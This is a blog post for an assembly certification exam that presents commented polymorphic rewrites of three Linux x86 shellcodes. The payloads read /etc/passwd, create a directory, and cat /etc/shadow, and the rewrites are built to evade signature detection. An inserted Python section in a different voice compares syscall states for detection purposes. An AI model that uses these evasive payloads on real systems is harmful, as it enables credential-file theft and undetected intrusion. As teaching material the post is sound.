Friday, 15 May 2020


This blog post has been created for completing the requirements of SecurityTube Linux Assembly Expert Certification: http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/ Student ID: SLAE - 1342
Hello Shellcoders,
     Welcome to Pwsec land. If you haven’t read my last blog post, in which I completed SLAE Assignment 5 on “METASPLOIT SHELLCODE'S ANALYSIS - LINUX X86”, you can check it [Here]. Today we will create polymorphic versions of three Linux x86 shellcodes taken from the shell-storm website. The requirements for the sixth SLAE exam assignment are:

  1. Take up 3 shellcodes from shell-storm and create a polymorphic version of each to beat pattern matching.
  2. The polymorphic versions cannot be larger than 50% of the existing shellcode.
  3. Bonus points for making it shorter in length than the original.
I have chosen these three shellcodes.

Let’s first understand what polymorphism is, as Wikipedia defines it: in computer terminology, polymorphic code is code that uses a polymorphic engine to mutate while keeping the original algorithm intact. That is, the code changes itself each time it runs, but the function of the code (its semantics) does not change at all. For example, 1+3 and 6-2 both achieve the same result while using different values and operations. This technique is sometimes used by computer viruses, shellcodes and computer worms to hide their presence from signature-based pattern matching.

I have also commented each of my polymorphic versions line by line.

Polymorphic shellcode 1

This shellcode reads the first 4096 bytes of the /etc/passwd file and writes them to stdout. The author of this shellcode is geyslan. You can find the shellcode [here].


Let’s run it,


So the original shellcode length is 57 bytes, and as you can see it printed out the contents of /etc/passwd.

Here is the polymorphic version of this shellcode.

;SLAE-1342
;Original shellcode:- http://shell-storm.org/shellcode/files/shellcode-842.php
global _start
section .text
_start:
lahf ;Load flags into AH (junk instruction; AH is zeroed by the xor below)
cmc ;Complement the carry flag (junk instruction; no effect on the registers we use)
xor eax,eax ;Anything xor'ed with itself is zero
cdq ;Sign-extend eax into edx:eax, so edx is now 0 as well
push edx ;push a null terminator on the stack
add al,0x5 ;add 5 to al, so 0+5=5 (syscall number of open)
push dword 0x64777373 ;"sswd"
push dword 0x61702f63 ;"c/pa"
push dword 0x74652f2f ;"//et" - the stack now holds "//etc/passwd\0"
mov ebx,esp ;ebx = pointer to the path
int 0x80 ;open(path, flags) - note ecx (flags) is never set and is relied on to already be 0 (O_RDONLY)
push eax ;save the returned file descriptor on the stack
mov ecx,ebx ;ecx = read buffer (the path's own stack location is reused as the buffer)
push ebx ;push ebx on stack
pop eax ;pop it straight back into eax (eax is overwritten below, this is just noise)
pop ebx ;pop the saved file descriptor into ebx,
;we did all this just to move the fd into ebx without a mov
xor eax,eax ;Anything xor'ed with itself is zero
add al,0x3 ;add 3 to al, so 0+3=3 (syscall number of read)
mov dx,0xfff ;dx = 0xfff (edx was already 0)
inc edx ;edx = 0x1000 = 4096 bytes
int 0x80 ;read(fd, buf, 4096)
xchg eax,edx ;edx = number of bytes read, which becomes the write count
xor eax,eax ;Anything xor'ed with itself is zero
push byte 0x4 ;push 0x4 on stack
push byte 0x1 ;push 0x1 on stack
pop ebx ;pop the 1, so ebx now holds 0x1 (stdout)
pop eax ;pop the 0x4, so eax now holds 0x4 (syscall number of write)
int 0x80 ;write(1, buf, count)
xchg eax,ebx ;ebx was 1, and the syscall number of exit() is 1, so just exchange eax and ebx
int 0x80 ;exit()
db 0x0a ;trailing newline byte appended after the code

Let's run it,


Now the shellcode length is: 59 Bytes
[Note: please refer to this video if you don’t know how to calculate the percentage increase.]

Size Increased by: 3.5%
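To make the "same semantics, different bytes" point concrete from the analyst's side, here is a small added example (my own code, not part of the original post or the shell-storm entries): a register-and-stack emulator for the instruction subset the listings above use. It records eax..edx at every int 0x80, so two sequences that a byte signature would treat as unrelated can be compared on what they actually hand to the kernel. The POLY and PLAIN sequences are constructed for the comparison; the emulator is an assumption-free toy, not a real CPU model.

```python
import re

REGS = ("eax", "ebx", "ecx", "edx")
SUB = {"al": ("eax", 0xFF), "bl": ("ebx", 0xFF), "dx": ("edx", 0xFFFF)}  # partial views
M32 = 0xFFFFFFFF

def run(asm):
    """Emulate the subset used above; return (eax, ebx, ecx, edx) at each int 0x80."""
    r = dict.fromkeys(REGS, 0)
    stack, traps = [], []
    def get(x):                       # register (full or partial) or immediate
        x = x.strip()
        if x in r:   return r[x]
        if x in SUB: full, m = SUB[x]; return r[full] & m
        return int(x, 0) & M32
    def put(x, v):                    # partial writes keep the untouched high bits
        x = x.strip()
        full, m = SUB.get(x, (x, M32))
        r[full] = (r[full] & ~m & M32) | (v & m)
    for line in asm.splitlines():
        line = line.split(";")[0].strip()           # strip comments
        if not line or line.endswith(":"):          # skip blank lines and labels
            continue
        op, _, rest = line.partition(" ")
        a = [s for s in re.sub(r"\b(byte|word|dword)\b", "", rest).split(",") if s.strip()]
        if op == "int":    traps.append(tuple(r[k] for k in REGS))
        elif op == "xor":  put(a[0], get(a[0]) ^ get(a[1]))
        elif op == "add":  put(a[0], get(a[0]) + get(a[1]))
        elif op == "inc":  put(a[0], get(a[0]) + 1)
        elif op == "mov":  put(a[0], get(a[1]))
        elif op == "push": stack.append(get(a[0]))
        elif op == "pop":  put(a[0], stack.pop())
        elif op == "xchg": v0, v1 = get(a[0]), get(a[1]); put(a[0], v1); put(a[1], v0)
        elif op == "cdq":  r["edx"] = M32 if r["eax"] & 0x80000000 else 0
        elif op == "mul":  r["edx"], r["eax"] = divmod(r["eax"] * get(a[0]), 1 << 32)
        elif op == "cmc":  pass                     # flag-only, no register effect
        else: raise ValueError("unsupported instruction: " + line)
    return traps

# Constructed comparison: the stack-shuffled write(2) setup from the listing above
# versus the plain mov form it replaces. The bytes differ, the syscall state does not.
POLY = "xor eax,eax\npush byte 0x4\npush byte 0x1\npop ebx\npop eax\nint 0x80"
PLAIN = "mov eax,4\nmov ebx,1\nint 0x80"

def equivalent(a, b):
    """True when both sequences reach every int 0x80 with identical eax..edx."""
    return run(a) == run(b)
```

This is the level at which syscall-based detection (seccomp audit logs, strace, eBPF tracing) still matches after the byte-level rewrite, which is why it is a more robust signal than a byte pattern.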

Polymorphic shellcode 2

This shellcode creates a directory with the name “hacked”. The author of this shellcode is zillion. You can find the shellcode [here].


Let’s run it,


So the original shellcode length is 36 bytes, and as you can see it just created a new directory with the name “hacked”.

Here is the polymorphic version of this shellcode.

;SLAE-1342
;Original shellcode:- http://shell-storm.org/shellcode/files/shellcode-542.php
global _start
section .text
_start:
jmp short ok ;jump to ok (jmp-call-pop technique to get the address of msg)
okk:
xor ecx,ecx ;Anything xor'ed with itself is zero
mul ecx ;The classic use of mul: edx:eax = eax*0, so eax and edx are now 0
pop esi ;esi = address of msg, pushed by the call below as its return address
push byte 0x27 ;push the byte 0x27 on stack
pop eax ;pop 0x27 (39) into eax, the syscall number of mkdir
lea ebx,[esi] ;ebx = address of "hacked" (same effect as mov ebx,esi)
push word 0x1ed ;push the word 0x1ed (octal 0755, the directory mode) on stack
pop ecx ;pop 0x1ed into ecx
int 0x80 ;mkdir("hacked", 0755)
xor eax,eax ;Anything xor'ed with itself is zero
inc eax ;eax is now 0x1, the syscall number of exit
int 0x80 ;exit()
ok:
call okk ;call okk, which pushes the address of msg on the stack
msg: db "hacked" ;msg holds the string "hacked"

Let’s run it,


Now the shellcode length is: 35 Bytes

Size Decreased by: 2.7%

Polymorphic shellcode 3

This shellcode reads the file /etc/shadow using the /bin/cat command, which it runs through the execve syscall. The author of this shellcode is antrhacks. You can find the shellcode [here].


Let’s run it,


So the original shellcode length is 42 bytes, and as you can see it printed out the contents of the /etc/shadow file.

Here is the polymorphic version of this shellcode.

;SLAE-1342
;Original shellcode:- http://shell-storm.org/shellcode/files/shellcode-758.php
global _start
section .text
_start:
xor ecx,ecx ;Anything xor'ed with itself is zero
mul ecx ;The classic use of mul: edx:eax = eax*0, so eax and edx are now 0
push edx ;push a null terminator on the stack
push dword 0x7461632f ;"/cat"
push word 0x6e69 ;"in"
push word 0x622f ;"/b" - the stack now holds "/bin/cat\0"
mov ebx,esp ;ebx = pointer to "/bin/cat"
push ecx ;push a null terminator on the stack
push dword 0x776f6461 ;"adow"
push word 0x6873 ;"sh"
push word 0x2f2f ;"//"
push dword 0x6374652f ;"/etc" - the stack now holds "/etc//shadow\0"
mov ecx,esp ;ecx = pointer to "/etc//shadow"
push edx ;push NULL to terminate the argv array
push ecx ;argv[1] = "/etc//shadow"
push ebx ;argv[0] = "/bin/cat"
mov ecx,esp ;ecx = argv (edx is still 0, so envp = NULL)
add al,10 ;add 10 to al, so 0+10=10
inc eax ;increase eax by one, so eax is now 11 i.e. 0xb, the syscall number of execve
int 0x80 ;execve("/bin/cat", argv, NULL)

Let’s run it,


Now the shellcode length is: 51 Bytes

Size Increased by: 21.4%

Pretty easy, huh? If you still have any doubt, then please feel free to ping me on twitter [@Pwsecspirit]

Thanks,

